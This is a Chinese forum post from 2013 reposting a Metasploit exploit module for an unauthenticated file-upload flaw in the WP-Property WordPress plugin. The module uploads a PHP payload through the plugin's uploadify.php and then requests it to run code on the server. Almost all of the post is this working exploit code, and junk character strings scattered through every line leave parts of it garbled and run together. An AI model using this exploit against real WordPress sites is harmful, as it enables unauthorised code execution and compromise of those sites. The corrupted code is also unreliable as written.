WordPress WP-Property PHP 文件上传漏洞; }5 Q9 b2 g! y6 y) [- P, H
% N9 ~8 K2 V$ H! o ## # This file is part of the Metasploit Framework and may be subject to1 V' ^; @" b! {
2 c: j# F* n0 G) ~6 {# Y: ~5 E c6 Q, h3 |" y
# redistribution and commercial restrictions. Please see the Metasploit
+ \0 c4 @3 ` V" G3 z9 p3 u5 t
# Framework web site for more information on licensing and terms of use.
$ v3 q1 o1 c0 R6 N8 \) x( i. R# i& O1 q! n& ^8 x
# http://metasploit.com/framework/ ##
' C4 u, V W# n/ i) P2 ?+ o
8 F! u3 _3 y( m2 U8 T2 [
0 K8 U- J$ T% H9 ^/ C0 F0 l: ]
( k5 M+ n# C; I
5 p2 I5 C0 ?+ k& U
, L" e: W; S7 X4 F* s$ @$ grequire 'msf/core'
( o, c0 f( M* m1 h5 a9 C3 _require 'msf/core/exploit/php_exe'1 v" k5 J1 u0 Y' z7 f) e+ c
. e) h5 {- [! b$ _class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',2 J; E v/ L+ ^/ ^9 b" q
'Description' => %q{& x. q, A7 X9 C% Y8 T
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
* M+ r* P4 i* ~0 g# B[5 g$ [. r4 P9 R/ _4 S3 `" m
'Sammy FORGIT', # initial discovery) E; Z( a; l: M1 ~1 |
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. a4 U$ s7 {/ w0 m7 H9 O],
" }* Z$ k# x( K" V'License' => MSF_LICENSE,# N' |% @. q; u) i8 j. p9 |. l/ c
'References' =>
5 P4 Q- F( N7 d" ?, E) M. k' \[* Q9 ?+ x& q7 W' p4 O
[ 'OSVDB', '82656' ],0 ?7 z0 z) `% I1 d
[ 'BID', '53787' ], g' q2 F% E) k {
[ 'EDB', '18987'],+ j8 x' _- G/ m9 i/ `# M" [
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
! q: ]' Z6 O! d ~ u],3 A: F/ m; \1 m
'Payload' =>
: p. u% a# W& x% y2 w{( N' {+ m/ f; m* n8 S) N
'BadChars' => "\x00",
k ~! o; h# z},
a# R8 B7 y. v( H" U'Platform' => 'php',; p" Z( |$ b6 \. @0 t) o) C
'Arch' => ARCH_PHP,% F0 Q1 |/ G- n
'Targets' =>* U4 z2 ^1 E; o8 C
[. h, ]9 Y0 y; m* e' O2 H% o7 B
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],2 T( X9 a2 `: u% l2 ~8 y4 t
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
$ s/ W6 h. z- o. X],) i" N. e- i2 O" n4 M) d! ^+ X5 F
'DefaultTarget' => 0,
- Y. U1 J4 g% f! N- y4 Q# b'DisclosureDate' => 'Mar 26 2012'))
) Z0 o! l7 r/ ]. I+ T3 R2 w: O" R2 Z7 \0 [ h! M
register_options(
- _3 i& z5 i& j! B[
$ {4 {( k3 h; Z( cOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])2 s R% X# F/ ?3 \
], self.class)
1 r% X* y5 [. r" O) Y' P2 H" Send( C' d1 l/ e" _, r+ \
+ ~* X4 Y/ T, ^# Z* e9 ]" M
def check0 ~$ L( k8 ]1 ~9 |; y! r
uri = target_uri.path
9 m9 z0 V& e( ]; `& Vuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
7 u) D: T* w8 i* \. n'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" e# t) q! j& a9 j
})
1 u. G7 S. G* m9 d/ q. y
0 y9 x% N0 [( k- [ fif not res or res.code != 200
, }& g/ P( j: l" K. }+ `return Exploit::CheckCode::Unknown
5 ~. h5 T3 Z) U4 N, Lend. Y+ ~# u; s# x) e( u; s
0 B( {& n& g# L2 n' e1 `0 a
return Exploit::CheckCode::Appears
; y9 e. }( @+ N& Vend
& q5 @2 J+ q9 c) b* w* u8 t! ~, Y8 B( k
def exploit
$ _7 n- d# l# H! E! w7 |uri = target_uri.path
! I g5 V8 \6 U# k8 o. ^, O# Auri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)9 t5 H$ c% f7 A, n! y, |
$ n V) d$ N, M, d' C& cdata = Rex::MIME::Message.new
( S2 E8 u: C; I6 J& Jdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")- j/ t4 R: O+ O- z% F
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")" g! m$ q1 O! {5 z6 d; x% `
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- c- q8 Y3 m3 F% f# n
5 j2 t/ x& g6 i g7 S- {) g3 _. Nprint_status("#{peer} - Uploading payload #{@payload_name}")
1 a) V. J5 [: A2 Gres = send_request_cgi({) f* E4 @9 y1 {$ @
'method' => 'POST',. Y4 q. V3 a& }9 W. {" U
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
& {9 d% B. `, x& B'ctype' => "multipart/form-data; boundary=#{data.bound}",
, |! m, q& r0 y'data' => post_data
: N0 W( S( H8 z: }})! L+ {3 K3 I1 E, V
3 U1 d1 h8 R) A; r% R. P
if not res or res.code != 200 or res.body !~ /#{@payload_name}/& J. Y. ?% `% f# F
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
6 r. z$ h$ @6 e7 eend5 S- @) a' ?$ o$ ^0 W1 |4 n9 C: b5 [
" i3 W6 y6 h$ M* m# X9 B O& Aupload_uri = res.body
7 ?( D( D6 D. N: U
7 t& f$ W' E+ \# Wprint_status("#{peer} - Executing payload #{@payload_name}")
0 a; g* P3 }3 |res = send_request_raw({
/ Z. u! U& o2 C1 \& I'uri' => upload_uri,
* p, z1 `( M% ^. t* G; z'method' => 'GET'
8 N5 P: }# @/ h})
- t4 \: k& o5 J9 G) n' e$ uend
m/ t% P5 c$ ]+ Y5 b9 t) u1 I8 Eend
+ ` B7 [/ v- o6 ~; K6 S, c/ P. |4 x" V9 S( G8 d; K v1 j1 r% T+ _
不要问我这写的是什么 怎么利用 我是说msf.: r# ]4 w% K/ ~, `* `$ }! O
1 f" r+ _2 O8 A% Q( Y% l
|
发表于 2013-1-4 19:51:30
收藏
支持
反对